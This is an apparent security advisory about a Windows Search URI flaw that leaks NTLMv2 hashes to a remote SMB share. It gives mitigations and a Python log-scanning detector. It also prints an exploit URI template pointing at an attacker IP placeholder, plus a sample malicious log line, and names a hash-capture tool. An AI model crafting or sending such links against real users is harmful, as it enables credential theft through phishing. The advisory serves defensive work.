Published on June 3, 2026
Windows Search URI Handler Flaw Leaks NTLMv2 Hashes to Attacker-Controlled Servers
Severity
Medium
Detail
A newly disclosed security flaw affecting the Windows Search URI handler allows attackers to capture Net-NTLMv2 authentication hashes from victim systems through a single user interaction. The issue was identified by Huntress and impacts Windows Search functionality through the search: and search-ms: URI schemes. The vulnerability belongs to the same class as CVE-2026-33829, which Microsoft previously patched in the Windows Snipping Tool. However, despite exhibiting similar behavior and security implications, Microsoft has not assigned a CVE identifier or released a security update for this Windows Search variant.
The flaw occurs when a specially crafted search URI includes a crumb=location: parameter pointing to a remote SMB share hosted by an attacker. Once triggered, Windows automatically attempts SMB authentication against the remote host, transmitting the victim’s Net-NTLMv2 hash. This behavior occurs before any error message is displayed to the user. Researchers successfully reproduced the issue on Windows 11 25H2 Pro under default security settings and standard user privileges. The attack requires only a single click on a malicious link and does not require malware installation, file downloads, or elevated privileges.
The issue affects both search: and search-ms: URI schemes because they share the same DelegateExecute COM handler (SearchExecute) within ExplorerFrame.dll. As a result, any input validation weakness within this component impacts both URI handlers. Previous research from Varonis and Trellix documented related attack surfaces involving Windows Search protocols, but the abuse of the crumb=location: parameter for direct NTLM credential leakage appears to be newly disclosed.
How?
The exploit leverages a single-click interaction to trigger automated Windows authentication over SMB. The attack relies on a specially crafted URI containing a remote Universal Naming Convention (UNC) path within the crumb=location: parameter, typically structured as:
search:query=test&crumb=location:\\<attacker_IP>\share
When this link is executed from a command prompt or clicked as a standard HTML hyperlink in a web browser such as Microsoft Edge, Windows immediately invokes the DelegateExecute CLSID {90b9bce2-b6db-4fd3-8451-35917ea1081b}. This causes the operating system to automatically attempt a connection to the specified external SMB server.
Attackers running credential-harvesting tools such as Responder on the remote server can immediately capture the outbound Net-NTLMv2 authentication hash. Notably, the credential leak is triggered only during the first invocation per user logon session. Subsequent attempts within the same session result in an “Access Denied” response without retransmitting the authentication hash.
Affected Components
The following URI handlers and system components are affected:
- Search URI Protocol Handler: search:
- Search-MS URI Protocol Handler: search-ms:
- ExplorerFrame.dll: SearchExecute COM class (CLSID {90b9bce2-b6db-4fd3-8451-35917ea1081b})
Conclusion
As Microsoft has opted not to issue a standard security patch for this specific search variant, organizations must rely on proactive administrative controls to mitigate risk. This flaw represents a highly effective phishing vector because it requires no user interaction beyond a single click on a link, bypassing traditional security prompts and browser downloads entirely.
Organizations should immediately implement the following security measures:
- Strictly block outbound TCP port 445 and port 139 at the network perimeter for all hosts that do not have an explicit business need to communicate via external SMB.
- Enforce SMB signing across the environment and evaluate disabling outbound NTLM traffic entirely (e.g., by configuring the RestrictSendingNTLMTraffic registry group policy to 2 after an appropriate system audit).
- Configure security information and event management (SIEM) tools to monitor, detect, and alert on any mail or proxy logs containing embedded references to search: and search-ms: URIs.
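As an added example (not code from the original report or from Huntress), the following Python sketches the log check the last measure calls for: it scans constructed mail and proxy log lines for embedded search: and search-ms: URIs, percent-decodes them, and rates any whose crumb=location: value is a UNC path to a remote host as high severity. The log line format and the host names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample mail/proxy log lines (not from the original page); 203.0.113.5 is a documentation address.
SAMPLE_LOGS = [
    '2026-06-03T10:01:12Z proxy user=alice url="https://intranet.example/search?q=report"',
    '2026-06-03T10:02:45Z mail to=bob link="search:query=test&crumb=location:\\\\203.0.113.5\\share"',
    '2026-06-03T10:03:01Z mail to=carol link="search-ms:query=docs&crumb=location:C:\\Users\\Public"',
    '2026-06-03T10:04:20Z proxy user=dave url="search-ms:displayname=Files&crumb=location%3A%5C%5Cfiles.example.net%5Cshare"',
]

# Any search:/search-ms: URI embedded in a log field, up to the next whitespace or quote.
URI_RE = re.compile(r'(?i)\b(search-ms|search):[^\s"\'<>]+')
UNC_RE = re.compile(r'^\\\\([^\\/]+)')


def parse_search_uri(uri):
    """Split a search:/search-ms: URI into its scheme and a lower-cased parameter map."""
    scheme, _, query = unquote(uri).partition(":")
    params = {}
    for part in query.split("&"):
        key, _, value = part.partition("=")
        params[key.lower()] = value
    return scheme.lower(), params


def classify(uri):
    """Return a finding describing how risky an embedded search URI is."""
    scheme, params = parse_search_uri(uri)
    crumb = params.get("crumb", "")
    location = crumb[len("location:"):] if crumb.lower().startswith("location:") else ""
    unc = UNC_RE.match(location)
    return {
        "scheme": scheme,
        "location": location,
        "unc_host": unc.group(1) if unc else None,
        # A crumb pointing at a UNC share is the pattern that triggers outbound SMB authentication.
        "severity": "high" if unc else "low",
    }


def scan_logs(lines):
    """Return one finding per search:/search-ms: URI found in the given log lines."""
    findings = []
    for line in lines:
        for match in URI_RE.finditer(line):
            finding = classify(match.group(0))
            finding["line"] = line
            findings.append(finding)
    return findings
```

Every hit is worth an alert under the guidance above; the severity field only orders triage so that UNC-backed crumbs are looked at first.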
Source
https://cybersecuritynews.com/windows-search-uri-flaw-leaks-ntlmv2-hashes/
https://thehackernews.com/2026/06/unpatched-windows-search-uri.html
